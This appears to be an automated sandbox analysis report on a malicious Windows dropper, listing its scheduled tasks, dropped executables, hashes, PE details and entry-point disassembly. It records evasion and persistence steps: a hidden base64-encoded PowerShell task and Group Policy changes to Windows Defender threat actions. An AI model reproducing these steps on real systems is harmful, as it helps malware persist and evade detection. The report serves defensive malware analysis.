Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.evad.winEXE@98/15@0/0
EGA Information:
• Successful, ratio: 80%
HDC Information:
• Successful, ratio: 99% (good quality ratio 96.3%)
• Quality average: 84.2%
• Quality standard deviation: 23.4%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): files.testupdate.info, clients2.google.com, login.live.com, settings-win.data.microsoft.com, api2.check-data.xyz, www.googleapis.com, www.testupdate.info, service-domain.xyz
• Execution Graph export aborted for target powershell.exe, PID 4040 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
16:11:13 | API Interceptor | 1x Sleep call for process: Install.exe modified
16:11:14 | Task Scheduler | Run new task: goSRLihgj path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
16:11:19 | Task Scheduler | Run new task: bbrwVHWbINAVAbZleQ path: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe s>UB /site_id 525403 /S
16:11:25 | API Interceptor | 29x Sleep call for process: powershell.exe modified
16:12:13 | API Interceptor | 1x Sleep call for process: KZDOWch.exe modified
16:12:17 | Task Scheduler | Run new task: uwdxcHIPRMOGjvUXa path: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe s>mT /site_id 525403 /S
16:12:21 | Task Scheduler | Run new task: dbcGzoJSgXXyj2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\DSaNCZvTTJTSDlVB\DndlVYr.wsf"
No context
Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | file.exe | malicious
 | file.exe | malicious
 | file.exe | malicious
 | file.exe | malicious
C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | file.exe | malicious
 | file.exe | malicious
 | file.exe | malicious
 | file.exe | malicious
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1108
                            Entropy (8bit):5.295294468448967
                            Encrypted:false
                            SSDEEP:24:3AkPpQrLAo4KAxX5qRPD42HZSCvKDe9tOBPnKEU:DPerB4nqRL/HZSCv4e9tOBfzU
                            MD5:1C80F1303DD3DDBE3C096705FF52040A
                            SHA1:3741403D56389B4EC7CF855E6C76C6DC2C95FF64
                            SHA-256:42D4B9FA1F3F8EB161A0C58AADA51D2A417CC8B5CCDA334905C62ACC84493F88
                            SHA-512:DC82F25447F671E173D1A7C4D00EAD4C3B1E040D913C7011F3D8A785625D1E26C5982DB8550A63947E996AAF104763C170E070C8BB176ED5EE17115D9DB3AB6C
                            Malicious:false
                            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):6612583
                            Entropy (8bit):7.996031565583186
                            Encrypted:true
                            SSDEEP:196608:91OcYDzJRIeC9BhkXw4751Kw57ro+2ozB+ZW6UoXm:3ORVRvC9DkXV751x5Y+2XXUgm
                            MD5:ACF9F750C53A4655AF0F2C792DC05166
                            SHA1:E977B268B5C249287A4696337636A84F16F0F27C
                            SHA-256:35202DF1D0FC3C21B4309528C02E25D7C97D2CBA4AFBE582BE302FCC15B85BA7
                            SHA-512:0F0BF7FA8F0D0C39CFD57C27A150C54CBCC507BC59309B06184F776CAFCFE827E853A2107479891652C31714A33D15A699A463C4C25AA4E5400B7B0CD000DD43
                            Malicious:true
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):829142
                            Entropy (8bit):7.999776755620295
                            Encrypted:true
                            SSDEEP:24576:khCiEwCogjACGlLO5Q5jmxuUw7kl/Klh0zy:khCibnCGQ6sxu6ah0+
                            MD5:BD5AA50828D7B24A25BAA86F0111EFC5
                            SHA1:48B315492C85E24FE13313F0340BB4FDCD3DD8C3
                            SHA-256:62B68829035BDA62873B1D714D92CF0731DF9C017486B1811CD041F42B622669
                            SHA-512:D95EF015A3AE028D2D4F38412C028084BC5461013A2B350BC0607B8D148836D6689A9E83AA3455B0D821F21D6DA58D2C318A0AEC72700020B01372891D5FE14E
                            Malicious:false
                            Preview:<H.....C+.a.Q|#..t._..Z-/..S..[5....>-P.u..o!......9On_......Q}.K...x.e...L[....v^..02......cC2..o....7.2@...z.pBn......,....f..V....e}.n..kWT.%....K@0k.m...-.a...Yk...$G8...k./v.|.0..z.1.0.........s.t./.re,.M.hjb..j...?.c.QC$.1..^]w..^....doS.....C_P.G...v-R.R.|...QF...+k..........'.E4w.J....."R>.....v...Z...@..a..|.a...`.f..@..c2...s......b..N..M~...W.,!...7.{4[....W0..x...P..)...|]$..;3$...:R.Dy..z.d...T.V..&..<L..].b..cZ%@.(.1B.&..Y..D.cn]......^ ..R..Xw..V#.}L..X>L.)..<k...p'..#....{.S2...u{.4v?.....B..k....A..l.u.@F...f..(.X].g..B..dY.-*g..........U2-.n..Y.UH.c.....?....(..\...^...^'9..7F1A.........F....@..i7.~.mk...|..z...5....J.."..]..9...#9...._.q.`^..Y...D>. ...7...............A.....4>.6f.F.2_.<..Y:.[..$.r...9..I......2.........K.9|..K.!.,.......T..R..=qY.qG....WZ...w`.\.qD<..'.m....s.g..!.]J....s.q...}5.<...u...,.P..qz.IV._CM...=..o.C..c8j.=.:.v.3.l.n....Vf...t%..QeY`.j&.'1.zaF.t6CE.yV.@...#Jf.q.C..^...Q?1r.F..1.."xhr2.
                            Process:C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7164928
                            Entropy (8bit):7.682142396721354
                            Encrypted:false
                            SSDEEP:196608:/gY0lrMBM10lsqZh2D5tMTUM6B2fVj30deCT:IY6rMBXlssK5mY0dj30ECT
                            MD5:C58B38377096B7C07958599E0E0C361A
                            SHA1:1029B366885B51D8D758E929E8651A1B6837B65D
                            SHA-256:F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
                            SHA-512:91C732CE67A97BEB3F1357404A43CC3654AE61D49175C79EF3950258A7C4C2763CDFC063CABE722B24D8738E3042FB928FC2F9CD010070C1BD7290A4201880DE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t............G......G......G/.................g.*.....G.....g......Rich...................PE..L......^.....................^......WI............@..........................`......3.n...@.................................4...x........J.......................O..................................pwl.@...............4............................text............................... ..`.data............[.................@....idata................l.............@..@.rsrc....J.......L....l.............@..@.reloc...O.......P....m.............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7164928
                            Entropy (8bit):7.682142396721354
                            Encrypted:false
                            SSDEEP:196608:/gY0lrMBM10lsqZh2D5tMTUM6B2fVj30deCT:IY6rMBXlssK5mY0dj30ECT
                            MD5:C58B38377096B7C07958599E0E0C361A
                            SHA1:1029B366885B51D8D758E929E8651A1B6837B65D
                            SHA-256:F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
                            SHA-512:91C732CE67A97BEB3F1357404A43CC3654AE61D49175C79EF3950258A7C4C2763CDFC063CABE722B24D8738E3042FB928FC2F9CD010070C1BD7290A4201880DE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t............G......G......G/.................g.*.....G.....g......Rich...................PE..L......^.....................^......WI............@..........................`......3.n...@.................................4...x........J.......................O..................................pwl.@...............4............................text............................... ..`.data............[.................@....idata................l.............@..@.rsrc....J.......L....l.............@..@.reloc...O.......P....m.............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12148
                            Entropy (8bit):5.378102183481723
                            Encrypted:false
                            SSDEEP:192:2tH+avF24XpAPcVUYNj2DAsbCEBOMSVFEJ+aNK1eS9kN8rI:2teMN1UW095lSVmerI
                            MD5:BECE3AD71BBF886EFC77494DF9CDF0D1
                            SHA1:BFE9016195D99ACE1E873DC9B0B8A1543E7B36E7
                            SHA-256:69C759DC9A5CC1C3285FE86BBAA6593205894F42057C66274560EE8CDEEE828F
                            SHA-512:BB4D0F15C6C8618353AC73CAFCCF9CA34A031962C88A1319A0A8F8F1C24E90090275ECA95E4160B486908001EFF00D2DE8D20B504E0CBCFFD3282C790F2EA465
                            Malicious:false
                            Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration............................................T.@..>@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@..S@..T@..T@.
                            Process:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
                            File Type:RAGE Package Format (RPF),
                            Category:dropped
                            Size (bytes):4486
                            Entropy (8bit):3.5451092744791444
                            Encrypted:false
                            SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ070wY0r04020s0G0wxok:Bx
                            MD5:30C693CF3EA702119A0F92E1002295B3
                            SHA1:37DB400CD4BDD79E0D9872EAC50B005A3E5B3B7C
                            SHA-256:19974A72A726C1378FBF1B21D7FCEA80CFD22068A70DE846AC3D13E6BE053A0E
                            SHA-512:2FB7053CB469B4083BD6FB680C7FACE3A1FEAA19736D3FCF69B6B49D1E6EC553384642FFCB8EC62D88AA3896C4991663E34D87E75D24C498B759C62E05C3CEE1
                            Malicious:false
                            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.
                            Process:C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):268
                            Entropy (8bit):4.9507895998010145
                            Encrypted:false
                            SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                            MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                            SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                            SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                            SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                            Malicious:true
                            Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.
                            Process:C:\Windows\SysWOW64\schtasks.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):526
                            Entropy (8bit):3.676691784811369
                            Encrypted:false
                            SSDEEP:12:O8jSX2RKQ10smIYMGmlAU9TM5KRKQ10smIYMGeUFHRQVbg:OAJ995YnURD995YJH
                            MD5:2C3BBF0A2BFC0FF21774F3AFBF53BB60
                            SHA1:0DBA401F0C4D277FA2BF95B39E6AB3F6102DE92A
                            SHA-256:E65B43863D62718D6D5AC3400205559D1FB5A6C3D25FA9C0809290A259FE9C73
                            SHA-512:D20A0652ED6C0371A686526F38AA65FA96E2CE26D74FD37C15AC27A4CA388614B5271B5F09A04851C8943FD50CF97A382D6B69EEF33E59C65D65445EDC0CFCF6
                            Malicious:false
                            Preview:.....D..%.@...6....F.......<... .....s...............................P.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.C.O.V.p.F.h.P.t.q.Y.P.o.U.N.u.B.L.\.z.K.Y.z.p.P.s.G.I.V.I.s.l.M.C.\.K.Z.D.O.W.c.h...e.x.e.....U.B. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...D.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.C.O.V.p.F.h.P.t.q.Y.P.o.U.N.u.B.L.\.z.K.Y.z.p.P.s.G.I.V.I.s.l.M.C.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.j.o.n.e.s...................0...............................................
                            Process:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7164928
                            Entropy (8bit):7.682142396721354
                            Encrypted:false
                            SSDEEP:196608:/gY0lrMBM10lsqZh2D5tMTUM6B2fVj30deCT:IY6rMBXlssK5mY0dj30ECT
                            MD5:C58B38377096B7C07958599E0E0C361A
                            SHA1:1029B366885B51D8D758E929E8651A1B6837B65D
                            SHA-256:F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
                            SHA-512:91C732CE67A97BEB3F1357404A43CC3654AE61D49175C79EF3950258A7C4C2763CDFC063CABE722B24D8738E3042FB928FC2F9CD010070C1BD7290A4201880DE
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 65%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t............G......G......G/.................g.*.....G.....g......Rich...................PE..L......^.....................^......WI............@..........................`......3.n...@.................................4...x........J.......................O..................................pwl.@...............4............................text............................... ..`.data............[.................@....idata................l.............@..@.rsrc....J.......L....l.............@..@.reloc...O.......P....m.............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\System32\gpupdate.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):129
                            Entropy (8bit):4.366220328806915
                            Encrypted:false
                            SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                            MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                            SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                            SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                            SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                            Malicious:false
                            Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.996937993784458
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:7607851
                            MD5:4a0ace7e59a840307eafe3c5975a7638
                            SHA1:5677a49aa5125af2bf2ce60dc9f304a106b462c1
                            SHA256:d6c028269bdbe895a6215ed9ba31b1e1fb674d1fb1edb713c133402c0c55fabf
                            SHA512:f3b4ab3e3de7b5ceeb6b1540b8dd3268425883cf5ee971d7098d44aa4c9c6d56d653e6f6995a43c41f45509f2c9aa6fd32f9a5c8b851d171899dae024714b238
                            SSDEEP:196608:91OZxFEtrnpCZf7hEQukI/tbnXQCjhE7+BZ9VopW0go:3OZvElnpCVlEFljuqBZzHW
                            TLSH:52763334B0E2DAB6CE8515739C549BE6D3E9E42B0F345D773BE80C394BBD9A02538A11
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........
                            Icon Hash:8484d4f2b8f47434
                            Entrypoint:0x414b04
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:
                            Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:3786a4cf8bfee8b4821db03449141df4
                            Instruction
                            push ebp
                            mov ebp, esp
                            push FFFFFFFFh
                            push 0041B9E0h
                            push 00414A2Ch
                            mov eax, dword ptr fs:[00000000h]
                            push eax
                            mov dword ptr fs:[00000000h], esp
                            sub esp, 58h
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-18h], esp
                            call dword ptr [0041B074h]
                            xor edx, edx
                            mov dl, ah
                            mov dword ptr [004233D0h], edx
                            mov ecx, eax
                            and ecx, 000000FFh
                            mov dword ptr [004233CCh], ecx
                            shl ecx, 08h
                            add ecx, edx
                            mov dword ptr [004233C8h], ecx
                            shr eax, 10h
                            mov dword ptr [004233C4h], eax
                            push 00000001h
                            call 00007F0480A2D84Bh
                            pop ecx
                            test eax, eax
                            jne 00007F0480A2C9BAh
                            push 0000001Ch
                            call 00007F0480A2CA78h
                            pop ecx
                            call 00007F0480A2D2FDh
                            test eax, eax
                            jne 00007F0480A2C9BAh
                            push 00000010h
                            call 00007F0480A2CA67h
                            pop ecx
                            xor esi, esi
                            mov dword ptr [ebp-04h], esi
                            call 00007F0480A2F46Ch
                            call dword ptr [0041B078h]
                            mov dword ptr [00425A3Ch], eax
                            call 00007F0480A2F32Ah
                            mov dword ptr [00423340h], eax
                            call 00007F0480A2F0D3h
                            call 00007F0480A2F015h
                            call 00007F0480A2EA70h
                            mov dword ptr [ebp-30h], esi
                            lea eax, dword ptr [ebp-5Ch]
                            push eax
                            call dword ptr [0041B07Ch]
                            call 00007F0480A2EFA6h
                            mov dword ptr [ebp-64h], eax
                            test byte ptr [ebp-30h], 00000001h
                            je 00007F0480A2C9B8h
                            movzx eax, word ptr [ebp+00h]
                            Programming Language:
                            • [ C ] VS98 (6.0) SP6 build 8804
                            • [C++] VS98 (6.0) SP6 build 8804
                            • [ C ] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [EXP] VC++ 6.0 SP5 build 8804
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e9e4 | 0x64 | .rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x27000 | 0xa60 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x1f8 | .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0x199ea | 0x19a00 | False | 0.5822884908536585 | DOS executable (COM) | 6.608494417524647 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata | 0x1b000 | 0x4494 | 0x4600 | False | 0.31166294642857145 | data | 4.368016436198423 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data | 0x20000 | 0x5a48 | 0x3200 | False | 0.122890625 | data | 1.370539432871311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .sxdata | 0x26000 | 0x4 | 0x200 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x27000 | 0xa60 | 0xc00 | False | 0.3388671875 | data | 3.3019646948427273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country
                            RT_ICON | 0x274a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
                            RT_ICON | 0x27788 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States
                            RT_DIALOG | 0x278d8 | 0xb8 | data | English | United States
                            RT_STRING | 0x27990 | 0x94 | data | English | United States
                            RT_STRING | 0x27a28 | 0x34 | data | English | United States
                            RT_GROUP_ICON | 0x278b0 | 0x22 | data | English | United States
                            RT_VERSION | 0x271e0 | 0x2bc | data | English | United States
                            DLL | Import
                            OLEAUT32.dll | VariantClear, SysAllocString
